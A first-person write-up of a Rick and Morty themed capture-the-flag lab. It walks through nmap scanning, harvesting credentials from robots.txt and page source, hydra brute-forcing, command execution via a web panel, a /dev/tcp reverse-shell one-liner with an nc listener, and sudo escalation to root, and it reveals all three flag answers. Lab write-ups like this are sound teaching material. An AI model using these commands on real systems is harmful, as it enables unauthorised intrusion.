The first step for any such challenge is to scan the server by nmap. I generally use the options: -A and -T4 however you can also use NSE along with it by adding –script=vuln. This gives us a lot of input and we have to look for relevant information in it. But on the plus side it sometimes provides us with valuable information.
2. Now I knew that it has a webpage since port 80 is open. Then I checked its robots.txt file and found a string: Wubbalubbadubdub
At this point we don’t have any information about what this string could be so just make a note of it as of now and move on.
3. Then I checked the source code of the homepage given to us and it contained some interesting info. It gave us a username: R1ckRul3s
At this time I had a hunch that the above string could actually be a password for something.
4. My next step was to use dirbuster for locating hidden files and directories on the server. This led me to a login page
5. Next step is pretty clear. To use the username as R1ckRul3s and try password as Wubbalubbadubdub to see if we can log into the server.
To tell you the truth I actually used hydra to brute force the password from rockyou.txt wordlist and after a minute it clicked me that maybe that string was the password all along. And it actually was.
6. Logged in. At this point we see a text field for writing commands and typing ls into it made me realize that we can directly write linux commands into it.
7. You must be thinking that easy peasy we can just cat the file to view its contents. But nope
8. But we do have some alternatives for cat. And less worked perfectly. So, by using the command less Sup3rS3cretPickl3Ingred.txt we get our 1st ingredient: mr. meeseek hair
9. Since I basically have an SSH into the server, I started to look around into the home folder.
10. Just like before I used less to open this file and found our 2ndingredient: 1 jerry tear
11. After this step I realized that maybe I’m not logged in as the root user. So I checked it with the whoami command and I actually was the www-data user.
12. At this point the only thing in my mind was privilege escalation. So I tried to see if there’s some info about any command that I’m not allowed to execute. The command I used is sudo -l
13. The line (ALL) NOPASSWD: ALL means that I’m allowed to run every command which would have required a password without one. That means running sudo without a password. So I tried sudo bash to get a root account but that did not work.
14. The next thing I had in mind was to try this again but from a terminal this time. So I used a reverse shell to obtain a shell on terminal. For this I went to gtfobins(gtfobins.github.io) and searched for bash àreverse shell and found the following code which I modified according to my use case
bash -c ‘exec bash -i &>/dev/tcp/$RHOST/$RPORT <&1’
so this became
bash -c ‘exec bash -i &>/dev/tcp/<my_ip_address>/12345 <&1’
15. Then I opened port 12345 for listening on a terminal window with the following command: nc -lvnp 12345.
16. Finally I ran the reverse shell code on the site. And voila. I got a shell on the terminal.
17. Then I ran bash sudo and finally got root access on the system. At the end of this challenge I looked into the root folder and printed the only file there which is our 3rd ingredient: fleeb juice